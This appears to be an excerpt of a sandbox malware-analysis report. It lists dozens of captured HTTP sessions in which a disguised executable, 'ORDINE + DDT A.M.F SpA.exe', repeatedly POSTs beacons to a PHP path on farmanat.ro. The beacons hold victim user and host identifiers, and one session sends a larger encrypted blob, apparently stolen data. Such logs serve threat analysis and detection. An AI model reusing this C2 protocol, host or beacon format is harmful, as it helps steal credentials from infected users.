Nov 25, 2021 10:48:13.730961084 CET	6332	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
190	192.168.11.20	50032	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:47.621285915 CET	6586	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:47.655595064 CET	6587	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:47.706348896 CET	6587	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
191	192.168.11.20	50033	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:48.138015032 CET	6588	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:48.171521902 CET	6588	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:48.220877886 CET	6588	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
192	192.168.11.20	50034	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:48.608439922 CET	6589	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:48.642729998 CET	6589	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:48.695771933 CET	6590	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
193	192.168.11.20	50035	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:49.101921082 CET	6590	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:49.135534048 CET	6590	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:49.190454960 CET	6591	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
194	192.168.11.20	50036	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:49.626648903 CET	6592	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:49.660192966 CET	6592	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:49.713457108 CET	6592	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
195	192.168.11.20	50037	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:50.135554075 CET	6593	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:50.169799089 CET	6593	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:50.221152067 CET	6594	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
196	192.168.11.20	50038	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:50.664838076 CET	6594	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:50.698282957 CET	6594	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:50.747390985 CET	6595	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
197	192.168.11.20	50039	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:51.178533077 CET	6596	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:51.212086916 CET	6596	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:51.261311054 CET	6596	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
198	192.168.11.20	50040	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:51.668766975 CET	6597	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:51.703015089 CET	6597	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:51.753004074 CET	6598	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
199	192.168.11.20	50041	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:52.098875046 CET	6598	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:52.132258892 CET	6598	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:52.187622070 CET	6599	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49821	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:00.994992018 CET	6299	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 3206 Connection: close
Nov 25, 2021 10:48:00.995047092 CET	6301	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: 'ckav.ruArthur468325W1064_038+T028278665D4ACB73EF64D459AtjeQQyH0M03(LegacGnri!:t1=ge
Nov 25, 2021 10:48:00.995079994 CET	6302	OUT	Data Raw: a6 ec 11 70 8d e2 00 3a 1d 40 b0 f9 48 fb d0 00 ac 51 24 9d 50 f7 10 62 00 c5 5e d1 ce 06 1b 73 21 00 dc 58 78 4e a3 8e de b3 e9 fc 84 23 38 3c fc 00 e0 0c 5d 97 c3 aa dd 00 66 09 ac 1f d7 f4 c5 eb 00 2c 68 95 27 b4 85 d1 37 00 f9 34 64 4c 04 2b Data Ascii: p:@HQ$Pb^s!XxN#8<]f,h'74dL+FA^HbN"W1n,ue$l$k?w5S]~4+>gm\tPZLv%f3-L~C76`mL
Nov 25, 2021 10:48:01.080023050 CET	6302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.11.20	49855	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:14.406984091 CET	6333	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:14.441381931 CET	6333	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:14.524874926 CET	6333	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
200	192.168.11.20	50042	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:52.618484020 CET	6600	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:52.652628899 CET	6600	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:52.711206913 CET	6600	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
201	192.168.11.20	50043	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:53.143999100 CET	6601	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:53.177560091 CET	6601	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:53.227083921 CET	6601	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
202	192.168.11.20	50044	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:53.594525099 CET	6602	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:53.627895117 CET	6602	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:53.683412075 CET	6603	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
203	192.168.11.20	50045	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:54.082518101 CET	6604	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:54.116864920 CET	6604	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:54.167495966 CET	6604	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
204	192.168.11.20	50046	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:54.580385923 CET	6605	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:54.614103079 CET	6605	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:54.663429976 CET	6605	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
205	192.168.11.20	50047	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:55.062275887 CET	6606	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:55.096374989 CET	6606	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:55.145977974 CET	6607	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
206	192.168.11.20	50048	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:55.508759975 CET	6608	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:55.542339087 CET	6608	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:55.594141006 CET	6609	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
207	192.168.11.20	50049	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:56.010864019 CET	6609	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:56.044473886 CET	6609	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
